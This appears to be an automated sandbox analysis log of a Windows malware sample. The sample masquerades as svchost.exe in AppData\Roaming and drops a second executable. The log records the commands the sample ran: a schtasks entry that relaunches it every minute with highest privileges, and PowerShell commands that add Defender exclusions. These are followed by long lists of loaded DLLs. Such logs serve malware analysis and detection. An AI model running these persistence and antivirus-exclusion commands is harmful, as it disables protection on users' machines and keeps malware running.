                Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
                Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe "C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe"
                Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Process created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe "C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe"
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: slc.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: edputil.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: slc.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: sppc.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: wbemcomn.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: edputil.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: slc.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: sppc.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: sxs.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: scrrun.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: linkinfo.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ntshrui.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cscapi.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: avicap32.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: msvfw32.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
                Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
                Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: vcruntime140_clr0400.dll
